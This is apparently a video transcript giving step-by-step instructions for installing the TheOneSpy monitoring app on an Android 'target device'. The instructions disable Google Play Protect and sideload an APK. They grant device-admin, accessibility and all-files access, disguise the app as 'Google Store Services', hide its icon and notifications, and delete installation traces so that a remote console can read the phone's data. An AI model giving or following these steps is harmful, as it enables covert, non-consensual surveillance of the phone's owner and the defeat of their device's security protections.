Welcome to TheOneSpy, a complete guide on installation. Open Google Play Store. Tap on the account icon in the top right corner. Click on Play Protect. Tap on the settings icon in the top right corner. Turn off Scan Device for security threats. Turn off Improve Harmful App Detection. Open any browser and go to tosapp.co. Wait for the page to load. Enter the activation code and hit the Submit button. A pop-up will appear shortly. The app will begin downloading automatically. Once the app download is completed, tap on the downloaded file. A pop-up will appear. Tap on Install. After installation, tap on the Open button to launch the app. Tap on Allow to grant the permission. Now select your desired language and tap Next. Tap on Allow to grant the permission for Install Unknown Sources. A warning dialog will appear. Tap on the I'm Aware checkbox and hit OK. Tap on the Download button to download the required app. Once downloaded, tap on Install to install the downloaded application. After successful installation, the new app will open automatically. Tap on No Restrictions to ignore battery optimization for app. Once the application opens, you will receive several permission dialogues. For each dialog, tap Allow while using the app, or Allow All as appropriate. Enter the activation code to activate the app, then tap on the Activate Service button. After activation, tap on Allow, then select Allow all the time to grant permission. Tap on the Allow button. Select Allow Management of all files to grant access to all files. Tap on the Allow button, and tap on the Activate button to grant administrator access to the device. A warning dialog will appear. Tap the I'm Aware checkbox and hit OK. Tap on the Allow button. Turn off the switch for Show Notifications. Click on the Allow button. Select Google Store Services from the list. A dialog will appear. Click OK to grant the permission. Tap the back button twice to return to the app installation process. Tap on the Allow button. Choose Google Store Services from the list and tap on it. Tap the three dots in the bottom center and select Allow Restricted Settings. Enter your target device password to grant access to all restricted settings. Tap the back button twice to return to the app installation process. Tap on Allow button, then click on Other Permission. Tap on Show on Lock Screen and click on Allow button. Now hit Back button. Tap on Open New Window while running in background and click on Allow button. Now press Back. Tap on Display Pop-up Windows and click on Allow button. Tap on the Allow button. Select Google Store Services from the list. Enable the Allow Permission switch. A warning dialog will appear. Tap the I'm Aware checkbox and tap to the Allow button. Then turn on the switch for Google Store Services. A dialog will appear. Tap on the Allow button. A warning dialog will be shown. Tap on I'm Aware checkbox and hit OK. Grant accessibility permission by tapping on the Allow button. Tap on Downloaded Apps button. Find Google Store Services from the app list. Then, turn on the permission switch for Google Store Services. A warning dialog will appear. Tap on I'm Aware checkbox and hit OK. If you want to hide the app, just click on OK. Or, if you want to change the app's name and icon and make it visible on the home screen, then choose the app and name. A dialog will appear asking, "Do you want to remove traces of this app?" Tap on Yes to delete the installer application and the downloaded APK file from the Downloads folder. Once installation complete, you can monitor device data by visiting https://console.theonespy.com. Thanks for watching.